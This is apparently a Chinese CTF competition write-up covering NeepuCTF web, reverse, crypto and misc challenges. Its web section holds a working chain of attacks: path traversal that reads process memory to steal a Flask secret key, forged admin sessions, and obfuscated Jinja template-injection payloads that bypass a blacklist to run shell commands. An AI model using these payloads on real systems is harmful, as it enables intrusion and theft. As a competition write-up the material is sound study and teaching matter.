文章目录
- Web
- Cute Cirno
- Cute Cirno(Revenge)
- Rev
- How to use ida?
- Base
- How to use python?
- IKUN检查器
- junk code
- Crypto
- FunnyRsa
- Loss
- loud
- Misc
- 吉林第一站
- 倒影
- Shiro
- 重生之我是CTFer
- 问卷
Web
Cute Cirno
学艺不精的我脑袋要炸了
在Cirno界面的源代码中发现任意读
考虑之前的比赛看到过一个任意读文件,是考SECRET_KEY
这里尝试让他报错,因此我访问了http://neepusec.fun:28723/r3aDF1le?filename=…/…/…/…/…/proc/self/mem
读取CuteCirno.py并保存
from flask import Flask, request, session, render_template, render_template_string
import os, base64
from NeepuFile import neepu_files
CuteCirno = Flask(__name__,
static_url_path='/static',
static_folder='static'
)
CuteCirno.config['SECRET_KEY'] = str(base64.b64encode(os.urandom(30)).decode()) + "*NeepuCTF*"
@CuteCirno.route('/')
def welcome():
session['admin'] = 0
return render_template('welcome.html')
@CuteCirno.route('/Cirno')
def show():
return render_template('CleverCirno.html')
@CuteCirno.route('/r3aDF1le')
def file_read():
filename = "static/text/" + request.args.get('filename', 'comment.txt')
start = request.args.get('start', "0")
end = request.args.get('end', "0")
return neepu_files(filename, start, end)
@CuteCirno.route('/genius')
def calculate():
if session.get('admin') == 1:
print(session.get('admin'))
answer = request.args.get('answer')
if answer is not None:
blacklist = ['_', "'", '"', '.', 'system', 'os', 'eval', 'exec', 'popen', 'subprocess',
'posix', 'builtins', 'namespace','open', 'read', '\\', 'self', 'mro', 'base',
'global', 'init', '/','00', 'chr', 'value', 'get', "url", 'pop', 'import',
'include','request', '{{', '}}', '"', 'config','=']
for i in blacklist:
if i in answer:
answer = "⑨" +"""</br><img src="static/woshibaka.jpg" width="300" height="300" alt="Cirno">"""
break
if answer == '':
return "你能告诉聪明的⑨, 1+1的answer吗"
return render_template_string("1+1={}".format(answer))
else:
return render_template('mathclass.html')
else:
session['admin'] = 0
return "你真的是我的马斯塔吗?"
if __name__ == '__main__':
CuteCirno.run('0.0.0.0', 5000, debug=True)
能观察到这里也用了SECRET_KEY
找到蓝帽杯初赛-file-session的wp
https://erroratao.github.io/2022/07/10/File_Session/#%E8%93%9D%E5%B8%BD%E6%9D%AF%E5%88%9D%E8%B5%9B-file-session-%E8%A7%81%E8%A7%A3
然后看看view-source:http://neepusec.fun:28723/r3aDF1le?filename=…/…/…/…/app/NeepuFile.py
他自己做了end - start
因此修改一下题目中提到的脚本
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import re
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
url_1 = "http://neepusec.fun:28723/r3aDF1le?filename=../../../../../proc/self/maps"
res = requests.get(url_1)
maplist = res.text.split("\n")
for i in maplist:
m = re.match(r"([0-9A-Fa-f]+)-([0-9A-Fa-f]+) rw", i)
if m != None:
start = int(m.group(1), 16)
end = int(m.group(2), 16)
url_2 = "http://neepusec.fun:28723/r3aDF1le?filename=../../../../../proc/self/mem&start={}&end={}".format(
start, end)
res_1 = requests.get(url_2)
if "*NeepuCTF*" in res_1.text:
print start
print end
print url_2
在其中一个里面找到kmp5Kotbfv2slKsa0QmanJtVbc5w/+ksRelAfPqp*NeepuCTF*
import base64
from flask import *
import pickle
SECRET_KEY = "kmp5Kotbfv2slKsa0QmanJtVbc5w/+ksRelAfPqp*NeepuCTF*"
app = Flask(__name__)
app.config.update(dict(
SECRET_KEY=SECRET_KEY,
))
@app.route("/", methods=['GET', 'POST'])
def login():
session['admin'] = 1
return 'mu'
if __name__ == '__main__':
app.run(host='0.0.0.0', port=11451)
拿到admin的session为eyJhZG1pbiI6MX0.ZGhpmA.I864rEAyzi7sKOWNnzqiP1tIl4g
访问genius,带上session
ssti
这里可以参考到ctfshow ssti 题目第369题和网络安全平台测试赛的一个比赛
这里用{%print((lipsum|lower|list))%}查到字符
['<', 'f', 'u', 'n', 'c', 't', 'i', 'o', 'n', ' ', 'g', 'e', 'n', 'e', 'r', 'a', 't', 'e', '_', 'l', 'o', 'r', 'e', 'm', '_', 'i', 'p', 's', 'u', 'm', ' ', 'a', 't', ' ', '0', 'x', '7', 'f', '2', 'c', '6', '4', 'b', 'f', '1', '8', '2', '0', '>']
通过写个脚本获取到__globals__,__getitem__,os,popen,read
然后因为过滤了pop,采用数组的方式获取值
但是这里复现的时候没有字符d,当时做的时候lipsum里面正好有呜呜呜,导致用不了read,于是从(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)中取
在(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]中取到
上面执行的是ls,这里再看一下ls /
{%print(lipsum[(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]][(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[11]~(lipsum|lower|list)[5]~(lipsum|lower|list)[6]~(lipsum|lower|list)[5]~(lipsum|lower|list)[11]~(lipsum|lower|list)[23]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]]((lipsum|lower|list)[7]~(lipsum|lower|list)[27])[(lipsum|lower|list)[26]~(lipsum|lower|list)[7]~(lipsum|lower|list)[26]~(lipsum|lower|list)[11]~(lipsum|lower|list)[3]]((lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[9]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[312])[(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]]())%}
有一个readflag和flag,应该是要执行readflag,先试试读flag(cat /flag)
{%print(lipsum[(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]][(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[11]~(lipsum|lower|list)[5]~(lipsum|lower|list)[6]~(lipsum|lower|list)[5]~(lipsum|lower|list)[11]~(lipsum|lower|list)[23]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]]((lipsum|lower|list)[7]~(lipsum|lower|list)[27])[(lipsum|lower|list)[26]~(lipsum|lower|list)[7]~(lipsum|lower|list)[26]~(lipsum|lower|list)[11]~(lipsum|lower|list)[3]]((lipsum|lower|list)[4]~(lipsum|lower|list)[15]~(lipsum|lower|list)[5]~(lipsum|lower|list)[9]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[312]~(lipsum|lower|list)[1]~(lipsum|lower|list)[19]~(lipsum|lower|list)[15]~(lipsum|lower|list)[10])[(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]]())%}
结果是空的,应该就是要执行/readflag了
http://neepusec.fun:28692/genius?answer={%print(lipsum[(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]][(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[11]~(lipsum|lower|list)[5]~(lipsum|lower|list)[6]~(lipsum|lower|list)[5]~(lipsum|lower|list)[11]~(lipsum|lower|list)[23]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]]((lipsum|lower|list)[7]~(lipsum|lower|list)[27])[(lipsum|lower|list)[26]~(lipsum|lower|list)[7]~(lipsum|lower|list)[26]~(lipsum|lower|list)[11]~(lipsum|lower|list)[3]]((lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[312]~(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]~(lipsum|lower|list)[1]~(lipsum|lower|list)[19]~(lipsum|lower|list)[15]~(lipsum|lower|list)[10])[(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]]())%}
这里替换给我替换麻了。看Revenge去
Cute Cirno(Revenge)
操作同上()
执行的app.py的文件名用proc/self/cmdline看到CuteCirnoRev.py
http://neepusec.fun:28698/r3ADF11e?filename=…/…/…/…/…/app/CuteCirnoRev.py
其他操作不变 payload不变
Rev
How to use ida?
IDA打开就行
Base
查看encode_1和encode_2
encode_1:rot偏移3
encode_2:base64
welcometotheworldofctf
Neepu{welcometotheworldofctf}
How to use python?
import string
from tqdm import tqdm
table = string.printable
for i in tqdm(table):
for j in table:
for k in table:
for h in table:
s = i+j+k+h
if(sum(ord(x) * 10000 ** i for i, x in enumerate(s[::-1])) ==110009500490115):
print(s)
import hashlib
import string
from tqdm import tqdm
table = string.printable
for i in tqdm(table):
for j in table:
for k in table:
for h in table:
flag = f'Neepu{{Pyth0n_1s_a_t{i}{j}l_{k}1{h}ku}}'.encode()
m = hashlib.sha256(flag).hexdigest()
if(m == 'a04f00829f27a5ead1c4ae526d6b1b0cec30ed0e56d6d71e9c001d7803e84892'):
print(flag)#Neepu{Pyth0n_1s_a_t00l_y1_ku}
IKUN检查器
dnspy打开
分别看
somd5解得到1998-8-2
somd5解得到jinitaimei
中间加-
解aes
最后输入
就是输入的sha256值,即Neepu{b8688fc33b5786095dc70a34ad14b9623905185663fa26dcc75d3b6b1f69999e}
junk code
加了花指令,而且正常运行的时候确实能发现输出了第二个字符,猜测有sleep,虽然加了花指令,但是这个不影响
nop掉
保存运行
Neepu{it-1s-not-junk-code-1u-1u-the-qq-bin-mat}
Crypto
FunnyRsa
看见e=3,直接带摸板
import gmpy2
import binascii
e = 3
n = 508480854372756755913791101745305762457517298159680989644747340327036977578527505318324958633232739687251409520866901608437945927574543155971443209922394847753303798988837755432365056098925797113097436966052676591464802061455795339989784949253878654243424430112737855583276666468348152646780267313723933052043652043457805179867064143032058107197027709609118240936819964179830722897401341043667501298533160902654255596452348828855631402136248161345374217307571507612687845128249648000080509946611349654016724007920186542131491886281036913471846314065665956824568534254734060468248256266109011728508043378818494008953002180704766570040343479609214117050941617109009620565019399761765253703071237034374358239723604390448411521487409469419576049566386525066685041905464761757345225778527338430347014422459954532168552493706796761693553297732745470452288495224654530482329002451540376107539184656257369225752541361996356642232449580990809290287044068126307915255465596308681516279323181254599943979030260297865604529605690218915679197797309258313924963034175283390070634287196300753230812822254122160704736109171545494720552113142650620106205647711854004731168393093254452512276389945341818288720153371447538338764655583233355044033698253
c = 1811190934126864017324358781557112607374925418749516169609783406151778537247582927245777048528376193187995730195136886128337489858508361912939739791856453029029472008503849636323475596821894021085406391087644300429282015652303512547583242875798709634440100351468653278854842376234162516591017755925768811542318681182791159664625408669418924102547889582147686273287037619637618739708338600060067635958832146122636281342410738805977631878905617340110767089538025585058506632889042141695774769826454213414615721715636679099281147824773004445559938086334729812819928608583224897377
i = 0
while True:
if gmpy2.iroot((c+i*n),3)[1] == True:#gmpy2.iroot(x,n) x开n次根
m = gmpy2.iroot((c+i*n),3)[0]
break
i += 1
print(binascii.unhexlify(hex(m)[2:]))
#b'Dear OOD PERSON,\n\nNeepu{1nterest1ng_D0_y0u_kn0w?}Welcom to NeepuCTF!G00d luck!!!'
Loss
题目和crypto感觉没多大关系,当misc做
发现hex(k)[2:]没有zfill,看了一下ct缺2,key缺3。因此写个脚本爆破
from Crypto.Cipher import AES
from tqdm import tqdm
def DecryAES(ct,key):
ct,key = bytes.fromhex(ct),bytes.fromhex(key)
aes = AES.new(key,AES.MODE_ECB)
m = aes.decrypt(ct)
return m
ct = '98691cbec88e449e8bac58e91142269a7da5efa9e7c62848e7135f1150f02a'
key = '8ee2b28564433679d93b82873fe8a'
ct_arr = []
key_arr = []
for i in range(len(ct)+1):
for j in range(i,len(ct)+1):
mod_ct = ct[:i] + '0' + ct[i:j] + '0' + ct[j:]
ct_arr.append(mod_ct)
for i in range(len(key)+1):
for j in range(i,len(key)+1):
for k in range(j,len(key)+1):
mod_key = key[:i] + '0' + key[i:j] + '0' + key[j:k] + '0' + key[k:]
key_arr.append(mod_key)
for ct2 in tqdm(ct_arr):
for key2 in key_arr:
m = DecryAES(ct2,key2)
if(b'Neepu' in m):
print(m)
loud
同之前的d3 的d3noisy的leak
官方的脚本:
改一下(事实上这题搞了很久没有像wp这样简单)
from sage.all import *
from sympy import nextprime
p=[66467878562792562224887473415011035371976498729276781135103070806273826602147, 87779827664444719705378632508432527366151596527264599732383282214161710342059, 106478845076259796180788022071614290976203859464583466743581048528447954519879, 96059795988661207615203630115134173796188205316583242342092930969746956840537, 76648433583138097341785050433545276046328401071616329410459071963649387342037, 75363807436621723536569872393312030066473340867618075065014040776064056013377, 84549506983821330145587582824091845683589581353932033068622843538281197238321, 111370876180722361599897961586244954018438484624454058266043059162224754345369, 64482965162169334114246637526347201196498007629645251181883638859700004974179, 115737745133463165088409210929201564518908251675851193212090312153202710950611, 65430568356698229457733164116539029669340192339524852345167889932007830803713, 83005759669335703543538842561745612525242745913149020160169673469294684269349, 86695300569990829413494539259312051326564517598709183416846805385774886176327, 87649503475806433108642579024197030978459906709386640769733298397489631575119, 67546279258240068058305769281370224151667980031696762855998467222703960646549, 109277222890519331704406685175081474974918071159722270158398833428598261621993, 94947541482876422720663520475916415155713415168744242709306335577278248129671, 72169704519430039945520319412623531417839608722431394881643470024106954771823, 67960163975784724339119270210646072354375119081204577840800359343098463410911, 99600976311231076437603674530239237427983536499904250636338541144596856152681]
S=[[36006797306819385066479875554093947690583427970449583820207929310836800884907, 42421831928852572111305575764455253114855197661030346257979092292334693704638, 12802758082612276306666301210467012086210333405770973816248015272325645518737, 35891119003347284519077367147618128608424314149438118637710340094202006973607], [69221811235046204007409195125183399115207721139473251108686359647136964539528, 68728546052531932227774742525240050245981893208569278338806756195046394386320, 77378932313251132635143406501260917558950175409375255430759788116685665756853, 52610629088183684552705334542273079173241031671071904128690224212767984326814], [84632180774187758644772651231005808936754972376616591239738706882585325508504, 22245885241129428291065279034982203110690225047634487933389806520943556010139, 65058154300579433325392929157176043693547112910255708084394089838078169979653, 26450521689799343844879689401496427283279097300795496218417820952255310453381], [31743210200723432871171527300926464156713378567872351797727553809801223755669, 13585899089974057026763852048073375117825112528263695778864069316682632842469, 61718974141826995988697061776372539645461814294568567001726256109104825647174, 51180314603392071189287058511013567287870020999513958065031674007822278281592], [54972437884087220348657249916515696089000557932808046438758622081654015388431, 60595394189514447466338506137494568375465810079275014516953880523799578017650, 48290106501584587524538351792623115913538457076946109833703750186838567097829, 75809640108047877199495621711957016420204838905577105767711805228492185803198], [2043782039074334576524460230918369530353673853539675192552828729137718721899, 49835004172676327317136633790276532689791891581739516605994211773520862094089, 74150446127124215081973853925119891529594162176613983713739514646864857274598, 3870903633214309884568064156029910145031131868082685800718700340446754642668], [58530922734504496400650172153260509666806593206632885245359170202099163777029, 24679955301703325026039585637067957593890919790442322117013190013849632870045, 47461847478301275711387089619360312020232490159064156700718722079533108310495, 78436661760605062831488783213279281637896003485976271847409520316669048162591], [3960169205004685923298734670827529710258905436583484891133449600679523626998, 56971763036590510871648632641525055519742294555040115044720432874482626152527, 7500941845513450196840656641552395008944195976110947855355515297144549893577, 104364444158131675753431216431697712763613996035708348677723420914206545999308], [21090310989423433113256120275297260716078136824734467530250689161392790805917, 59095240674034520085214866457855433129352762312493710903594522366480317145097, 25950268632849909273587896220763105221984980662119437334003683923010964181793, 22214910913289817220594820237750728594412035322558117144502181839908519483813], [6516207309607110723013310828779534786605721487724433166085213573594060054191, 62491095915002854769743893168840271080994195414466604510886959458801333994425, 43298696119722427147738220942971604096101207270771677319478440633957185506012, 95999300849358990419162309412086189707629278626118528491801630061635930409174], [21901937371736027133484836626793049950863305103635439434565692334061323247459, 22177707944556298482781825594816606678702151909926553218938857302296851101061, 37265517992688571580384548897674161792052985496826940853296718063969030761085, 45803015810935362104176472501216732994877801735307247883040947086374864784522], [22887302429552282917137975404437379689230279867683032429064655381687354309967, 63687512791087585071097169701758075850922324857489524802811455099431146712006, 43241233600118761031756067392063544631958472413548145463886944168747993611755, 78540416079875697330277927812643707908744419489483603613867805715379418188382], [83274701456245595041914535781657541250722792681868330743604458671030342631093, 29265221035131869074958665850197081103720257562467498607821734305785454256445, 19656036104607964818483236621454584533830854692521644548949580232419092579485, 36685991496747026794589417986750583003976651961717444764360736602328859939203], [7197271849934394038490337096465830651019854061628854994110403632096530818658, 13199583400545916173897024693988359528617080325104182927755868559199746329580, 76705903744610047925943025263768006533642196751938988456317343613219129386367, 8284847848213860404087592474405055922947517109038702885136704630947806019241], [40192513898904947184731216279798716826510915071804534174239538082671192078053, 756883344718645808681598066443462390307116757281839378450937721653214302485, 46319296839244788373603804279624137323125709215284595152627739510983625831713, 38066834404440733412548216101182968084184940639461830700714702917736840764910], [52459924240743004858678271074727889512634425322058383892565820049302166247484, 1124830903052334805081369416754962375712146318972731973481260141314675294280, 7048586820754100983732909765398789018269542052380424872274364753361851089050, 46261533803791211860667474793341333491934930635468558951890405299902112599717], [23712997405587065505471765580307890926020635436932008780552027395793174460196, 67696894015776789806885369424535665938702806354704500197616129889160343225036, 22335907790107175161378264382954791596027764567679319454957440806458200559861, 76817272441881586284817699756225532359147752598882508352406898668675942956599], [48442733699161048528383543478196401606393182356208996862954079146924798030016, 33988046942702399144226829264100378601075005547176282333019034404108127701223, 3878811651113775226499837109875057444157158981192358109242560352485567236840, 48096508435450140842190594378561970076075899550630622502080370324305787016204], [4661700708549906139665791533582485338344505441635713456342199101346895847315, 57085434497175712126874334119472545667616658739402471396702109228089918012639, 43291903057149273908186130451801222008858189682043034712173498638683726314620, 43681777323686685006867808938443372833327865869793588659920726812432020143637], [34817244237217626483621974571192315048341502556634007719371004295715069335162, 10855671893795758052388714204250213675262352053079039688785650172729770783108, 55808546957704772545340135312880985328286637622927964296444521648705445287337, 57996505385421171401445757882512186395065784033051493647151141293523405436642]]
n = 20
m = 4
B = 2**4096
P = 1
for i in range(n):
P *= p[i]
L = []
for i in range(n):
t = inverse(P//p[i],p[i])
L.append(t*(P//p[i]))
BB = matrix(n*m+1)
BB[0,0] = P
for i in range(n):
for j in range(m):
t = i*m + j
BB[t+1,t+1] = B
BB[t+1,0] = S[i][j] * L[i]
red = BB.LLL()
f = open(r'C:\Users\mumuzi\Desktop\outs.txt','w').write(str(red))
然后打开发现只有第一行的是一个正数和一坨0,其他都是有负数的,然后这里只有flag有值,原题是N也有15个值,因此第一行这个是符合要求的
因此尝试提交116926347417973739813389504748758673981034015364501761586986653891072159614466535442285940993424509487983408826535446174908960805420415826892247095629899711028817120829492104752602407109216917926271092220486968841156519990362949657487794025464819714162899699678997721569868660164545620667051526447422139521078040002214106645807945132338049458476984219774549279366132880281262873259579336469061431142093875314095384936916552701093157363813120451972804242781688459725262869243990446191731213239849534613643610956337393952997289528155686740057414072272137510704615005549047461973455194160253722511339247030805640858589842699243553893990352636820643317189483800653004195589918829455999679822736492945367960846445909281065494949166307806389546596789298753332846823642742703456348160285521746213654908420577340508033880925137019362574079782798769495078307996462897694930462678432564135136546708085518325059843563577692800896695337469509988693835802560372443455806502280391274164995314797779082864525968072787575692490640928881743177623466702363671996974454074849781021299229369520112211636727082759319836173414882071943165226884042463530718394000680023200019847602023738930464764671560604546094707989602894519207930387266023700987775382170,通过
Misc
吉林第一站
google搜图、百度识图
第一张图由于电脑上无法加文字,用手机
Neepu{zhuqueshan_songhuahu_dongbeidianlidaxue}
倒影
文件尾有个倒过来的png,手动分离然后再反转
f = open('reflection2.png','rb').read()
fw = open('re.png','wb').write(f[::-1])
发现两张图一样,但是用stegsolve直接xor出现蓝色线条,直接考虑盲水印
Neepu{THe_S3cR3t_UNd3r_t4e_R3fl3Ct10n}
Shiro
给了个流量包,能看到有五个很大的post,分别解码cmd,发现有个base64读取docx,还有一个读取了id_ssh
然后neepu跟的参数是一个class文件
jadx打开发现流量包的响应得到的内容是与某个key异或得到的
由于流量包拿了id_rsa且知道id_rsa的头,因此直接异或就能得到key
th1s_1s_n33pu_K4y
然后拿去解其他的,能够把docx的解出来
得到part2为W0wYoUF1ndMyAn0th3rS3cr3t
然后第一段需要爆破,当时爆了很久没爆出来,给了个hint是一个rockyou的部分密码
得到密码,最后得到flag是Neepu{nroamntiriina_W0wYoUF1ndMyAn0th3rS3cr3t}
重生之我是CTFer
就一直答题一直答题也不知道怎么的就过了答很多次
问卷
总之做了
.(img-VRDjB8lO-1684685036215)]
